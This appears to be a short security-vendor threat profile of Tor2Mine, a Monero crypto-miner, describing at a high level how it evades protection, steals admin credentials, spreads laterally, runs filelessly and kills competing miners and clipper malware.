Tor2Mine
Tor2Mine is a crypto-miner threat that hijackers the resources of compromised computers and uses them to mine for Monero, one of the more popular cryptocurrencies. The threat has been active for at least two years and in that period is has been improved and equipped with new functionalities continuously. The latest Tor2Mine variants detected by researchers exhibit increased evasion-detection capabilities, can spread automatically through the breached network, and are harder to eradicate completely from the infected devices.
The new variants can disable select malware protection solutions via a PowerShell script, execute the main payload of the miner, and try to obtain Windows administrator credentials simultaneously. The subsequent behavior of Tor2Mine is based on whether the threat has gained administrative privileges successfully, via collected credentials:
- If the crypto-miner has administrative credentials, it will use them to establish privileged access allowing it to install its crypto-mining files on the system. Tor2Mine also will exploit its admin privileges to move laterally through the network by searching for suitable machines and installing its files on them.
- If the threat fails to obtain admin privileges, it will still proceed to execute its miner payloads. However, in this case, the miner is initiated remotely and filelessly via commands run as scheduled tasks. It should be noted, that Tor2Mine will be stored remotely and not on the compromised system.
Tor2Mine also makes sure that it is the only threat running through the network by executing several scripts designed specifically to kill the processes and tasks of other competing crypto-miners or clipper malware. Clippers are malware threats tasked with collecting cryptocurrency addresses or substituting the legitimate wallet address of a transaction with one that belongs to the attackers so the money arrives in an account under their control.
Researchers note that if Tor2Mine is not removed from the network completely, it could continue to reinfect individual systems even if they have already been cleaned.
